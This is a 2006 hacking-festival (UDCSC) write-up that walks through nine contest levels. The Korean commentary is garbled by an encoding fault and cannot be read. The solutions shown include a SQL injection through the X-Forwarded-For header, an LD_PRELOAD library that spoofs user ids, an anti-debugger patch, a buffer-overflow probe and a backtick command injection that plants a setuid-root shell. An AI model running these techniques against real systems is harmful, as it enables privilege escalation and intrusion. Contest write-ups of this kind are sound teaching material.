Ͱѯxհѯxհѯxհѯxհѯx
f f
UDCSC 2006 Hacking Festival Report
f f
Ͱѯxѯxѯxѯxѯxѯxџy
[hkpco@ns hkpco]$ whoami
name : Park Chan Am
id : hkpco
mail&msn : hkpco@korea.com
homepage : http://hkpco.kr/
face_quality : High
: б
======================================================================================================
Ϻ б ̶ (?) ظ Ź帳ϴ.
̹ html̳ pdf ۼϰ ;..;
賡 ؾ߰ڽϴ. ^^;
======================================================================================================
Round 1.
----------------------------------------------------------------------
LEVEL1
UDCSC ȸ Ȩ ߴٰ?!
UDCSC ȸ Ȩ ̵ϱ
----------------------------------------------------------------------
ȸ Ȩ ŷߴٰ մϴ.
`ȸȨ ̵ϱ` ŬϿ ũ Ŭ ų(?) ѱ ϴ.
( ũ ϳ ɸ ʾұ )
ҽ⸦ غ( ٷ ãҽϴ.) Ʒ κ Դϴ.
iframe ܳ.. ϴ.
http://168.188.130.240/e987463bf0418539b306409f86997a21/count.php ,
մϴ! level1 н 'lets go together!' Դϴ.
н带 ȹϿϴ. ^^;
Round 2.
----------------------------------------------------------------------
LEVEL2
ڸ ƶ!
( ......... )
ѹα ౸ ȭ!
----------------------------------------------------------------------
level2 , ڵ尡 ִ ҽ Ǹ ϴ.
ҽ⸦ ϸ Ʒ ̸ Դϴ.
|
ΰ ġ±.
ó whatisthis.jpg غ Cҽ ־ϴ.
鼭 ϴ α̾µ, 15 ֽϴ.
Round 3.
----------------------------------------------------------------------
LEVEL3
ũĿ ɸ Ż Ʈ ¥ ƿƼ ÷.
ũĿ ɸ ID ˾Ƴ Ű!
ͳ ǵ ƿƼ ٿε
----------------------------------------------------------------------
Ŷ ĸ ٸ ˸ Ǯ ִ Դϴ.
irc ϴ α̱ ^^;
:padoirc.padocon.org 001 KOR|762083 :Welcome to the PADOCON IRC Network KOR|762083!otghnkz@59.15.35.196
:padoirc.padocon.org 002 KOR|762083 :Your host is padoirc.padocon.org, running version Unreal3.2.3
:padoirc.padocon.org 003 KOR|762083 :This server was created Wed Apr 27 2005 at 18:00:59 KST
:padoirc.padocon.org 004 KOR|762083 padoirc.padocon.org Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp
lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:padoirc.padocon.org 005 KOR|762083 SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60
NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20
WALLCHOPS WATCH=128 :are supported by this server
:padoirc.padocon.org 005 KOR|762083 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,
psmntirRcOAQKVGCuzNSMTG NETWORK=PADOCON CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:padoirc.padocon.org 251 KOR|762083 :There are 6 users and 5 invisible on 1 servers
:padoirc.padocon.org 254 KOR|762083 4 :channels formed
.
.
.
:KOR|762083!otghnkz@59.15.35.196 JOIN :#test
:padoirc.padocon.org 353 KOR|762083 #test:KOR|762083 KOR|778454 [8]KOR|762021 KOR|114838 crackers1m0dun KOR|441656 KOR|831437
:padoirc.padocon.org 366 KOR|762083 #test :End of /NAMES list.
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196
н crackers1m0dun
Round 4.
----------------------------------------------------------------------
Ư IP ϴ Proxy Server ϴ
Ʈ ִ. Ʈ ϶.
ID
PWD
----------------------------------------------------------------------
̹ ξ Ǯϴ.
ͿĿ , X-Forwarded-Forҵ sql injection ߴ ־µ
( ǵ ٰ ƴϾ ^^;)̹ ȸ ̷ ٴ...
Proxy Server ϴ Ʈ ִٰ Ͽϴ.
magic_quote onǾִٴ ֳ.
magic_quote onǾ־ Apache Environment ɼ ʽϴ.
level4 Apache Environment Ͽ sql injection ΰ ϴ.
Achilles ̿Ͽ 1и ~.
Proxy Server X-Forwarded-For ̶ Method ɴϴ.
ҵ忡 sql injection û ڽϴ.
GET /c853248badee15215da287ffa39d7965/level4.php?id=test&pwd=test HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://168.188.130.240/c853248badee15215da287ffa39d7965/
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 168.188.130.240
X-Forwarded-For: 'or 0=' <- ߰ κ
û----------------------------------------
մϴ! н 'caffelatt3' Դϴ.
Round 5.
----------------------------------------------------------------------
level5 ~ level 9
Login 168.188.130.240:SSH
id : udcsc
password : level4's password
-bash-3.00$ cat level5_hint
:: UDCSC ŷ 佺Ƽ 2006 LEVEL5 ::
. LEVEL5
/home/udcsc/level5/level5 Ѵ.
̿ؼ level5 н带 ȹض.
----------------------------------------------------------------------
~, Գ @_@
̹ ־ϴ Ǯ ־ϴ. ......
ٸ ̷̷ .. ϸ鼭 Բ ư Ƽ ߴ ־µ,,
̷ ...
ٸ ־, ȸ ǵ!, ^^;
ο ˷ִ, Ѵ Ͽ ۼؼ packetstorm ߾µ..
ۼ ϰ ~, Ʒ ũԴϴ.
http://packetstormsecurity.org/papers/attack/shl_hijacking.txt
shared library hooking̶ ִ Ͽ Ǯڽϴ.
-bash-3.00$ /home/udcsc/level5/level5
Sorry, Your id is not level5
level5 ƴ϶ ϴ±, uid,gidüũ Ͽ ڽϴ.( uid ϸ gid üũ ̷ϴ. )
-bash-3.00$ cat /etc/passwd|grep "level5"
level5:x:7979:7979::/dev/null:/sbin/nologin
-bash-3.00$ cat hk.c
#include
#include
#include
uid_t geteuid( void )
{
return 7979;
}
uid_t getuid( void )
{
return 7979;
}
uid_t getegid(void)
{
return 7979;
}
uid_t getgid(void)
{
return 7979;
}
-bash-3.00$ gcc hk.c -fPIC -shared -o hk.so
-bash-3.00$ export LD_PRELOADED="/tmp/hk.so"
-bash-3.00$ /home/udcsc/level5/level5
մϴ. level5 н 'i_like_raison' Դϴ.
nice!,
Round 6.
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL6 ::
. LEVEL6
http://168.188.130.240/level6/Labyrinth.exe ٿƶ.
----------------------------------------------------------------------
α ?_?ϴ ƾ ϰ ֽϴ.
ã nop äָ ˴ϴ.
.. α س.. ˼մϴ.( 賡 ؾ߰ڳ )
004016BE 68 C4F25B00 PUSH Labyrint.005BF2C4 ; ASCII "Debugger is detected! process terminated!"
004016BE 90 NOP
004016BE 90 NOP
004016BE 90 NOP
004016BE 90 NOP
н带 ִ κ(Congratulation ~~~~~~) ãƼ jmpָ ..^^
Round 7.
----------------------------------------------------------------------
-bash-3.00$ cat level7_hint
:: UDCSC ŷ 佺Ƽ 2006 LEVEL7 ::
. LEVEL7
/home/udcsc/level7/level7 Ѵ.
̸ мؼ level7 н带 ȹض.
----------------------------------------------------------------------
level8 κ 1оȿ ǬͰ..
̹ ʿ ..!,
-bash-3.00$ ls -l /home/udcsc/level7/level7
-r--r--r-- 1 root root 4876 6 23 18:12 /home/udcsc/level7/level7
-bash-3.00$ cp /home/udcsc/level7/level7 /tmp/haha
-bash-3.00$ /tmp/haha
-bash: /tmp/haha: 㰡 źε
-bash-3.00$ chmod 755 /tmp/haha
-bash-3.00$ /tmp/haha
մϴ. level7 н '112' Դϴ.
Round 8.
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL8 ::
. LEVEL8
ħ ־. ƶ!
----------------------------------------------------------------------
ħ ־ٰ մϴ. ..? ƴѵ...^^;
setuid۹̼ ϵ ãƺ Ư ǽɰ° ϴ.
ҳ Ͽ /home丮 ҽϴ.
-bash-3.00$ cd /home
-bash-3.00$ ls -al
հ 88
drwxr-xr-x 7 root root 4096 6 25 05:43 .
drwxr-xr-x 23 root root 4096 6 25 06:31 ..
-rw-r--r-- 1 7981 7981 24 6 23 13:00 .bash_logout
-rw-r--r-- 1 7981 7981 191 6 23 13:00 .bash_profile
-rw-r--r-- 1 7981 7981 124 6 23 13:00 .bashrc
-rw-r--r-- 1 7981 7981 383 6 23 13:00 .emacs
drwx------ 2 mysql mysql 4096 6 22 09:40 mysql
drwx------ 2 7978 7978 4096 6 23 23:35 shadow
drwx------ 8 udcsc udcsc 4096 6 25 07:48 udcsc
drwxr-xr-x 3 x15kangx x15kangx 4096 6 22 17:57 x15kangx
-bash-3.00$ cat /etc/passwd|grep "shadow"
-bash-3.00$
ߴ ǽɰ κ ֽϴ.
ٷ shadow!,
7981̶ user ãƺڽϴ.
-bash-3.00$ find / -user 7981 2>/dev/null
/mnt/.floppy/shadow
/home/.bash_logout
/home/.bashrc
/home/.emacs
/home/.bash_profile
-bash-3.00$ cat /mnt/.floppy/shadow
mysql pwd : shad0w!?
mysql pwdȹ ^^~
mysql ° ʹ غ ̰͵ İ ..
-bash-3.00$ mysql -u shadow -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3287 to server version: 3.23.58
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+----------+
| Database |
+----------+
| level4 |
| mysql |
| sebek |
| shadow |
+----------+
4 rows in set (0.00 sec)
mysql> use shadow
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------+
| Tables_in_shadow |
+------------------+
| shadow |
+------------------+
1 row in set (0.00 sec)
mysql> select * from shadow;
+--------+--------------------+
| id | pwd |
+--------+--------------------+
| level8 | starcraft_forever! |
+--------+--------------------+
1 row in set (0.00 sec)
mysql>
Round 9. Fight!
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL9 ::
. LEVEL9
Ŷ ſ ; Ѵ.
ϵ ִ .
----------------------------------------------------------------------
ſ ǹ̽մϴ. ..
ÿ 9000~9009 Ʈ ֽϴ.
Ʈ ִ° ƴϰ ÷ ٲ..
Ʒ ps -aux Ư Ʈ bindų Դϴ.
root 25870 0.0 0.1 2644 320 ? Ss 02:17 0:00 /usr/bin/level9 9005
root 25872 0.0 0.1 2856 276 ? Ss 02:17 0:00 /usr/bin/level9 9006
root 25874 0.0 0.1 2164 324 ? Ss 02:17 0:00 /usr/bin/level9 9007
root 25876 0.0 0.1 1516 324 ? Ss 02:17 0:00 /usr/bin/level9 9008
root 25878 0.0 0.1 3276 320 ? Ss 02:17 0:00 /usr/bin/level9 9009
root 26615 0.0 0.1 2280 272 ? Ss 02:32 0:00 /usr/bin/level9 9002
root 26619 0.0 0.1 2700 324 ? Ss 02:32 0:00 /usr/bin/level9 9004
.. ݸ ...
-bash-3.00$ ls -al /usr/bin|grep "level9"
-rwx------ 1 root root 7105 6 24 23:54 level9
-rwx------ 1 root root 6612 6 23 19:39 level9_send
-rwx------ 1 root root 221 6 25 00:06 level9_start.sh
-bash-3.00$ (perl -e 'print "A"x256')|nc localhost 9009
input your IP:
-bash-3.00$ (perl -e 'print "A"x255')|nc localhost 9009
input your IP:
got it?-bash-3.00$
ó 256Ʈ ̸̻ α got it? ϰ Ǿ remote fedora_bof ˾ҽϴ.
߿ ǵ ٸε б ȭ Ŷ ߰ ־ϴ.
ϳ ǵ ߰ߵǾϴ.
α level9_send ip Ǿµ, κп .. ſ .. ...
մϴ. Ƹ sprintfͰ %s ̿Ͽ ip ڰ ְ ״
⼭ ; , | , & ` ` ȸϿ ٸ ֽϴ.
̰ Ͽ Ʈ ȹ ڽϴ.
-bash-3.00$ cat /tmp/aa.c
#include
#include
int main( void )
{
setreuid(0,0);
setregid(0,0);
system("/bin/sh");
}
-bash-3.00$ cat /tmp/c.c
#include
#include
int main( void )
{
system( "cp /tmp/aa /tmp/kk" );
system( "chmod 6755 /tmp/kk" );
}
-bash-3.00$ chmod 6755 aa
-bash-3.00$ chmod 6755 c
-bash-3.00$ telnet localhost 9009
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
input your IP:`/tmp/c`
got it?Connection closed by foreign host.
-bash-3.00$ /tmp/c
sh-3.00#
Ʈ ȹ!, Ƹ level9_sendα ´ٸ н带 Դϴ.
strings ѹ Ȯ ڽϴ.
sh-3.00# strings /usr/bin/level9_send
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
socket
inet_addr
setsockopt
strncpy
htonl
sendto
memset
htons
_IO_stdin_used
__libc_start_main
strlen
GLIBC_2.0
PTRhx
a tiny encrypted packet! <--------------------------!!!
### usage : %s your_ip ###
your input %s is too long!
168.188.130.240
н a tiny encrypted packet! ^^;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ı:::
б ⸻̶ ʷ . ֽñ..̤
߿ ڽϴ.
level8 ѽð ȵǼ ǬͰ 0_0 츦 ϱ⸸ ߴµ ̷ ֱ..
ȸ غѴٰ Ͻ е մϴ.
.. ̸ ġ Ϸ ߰ڳ...
ε ȳ ^^;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-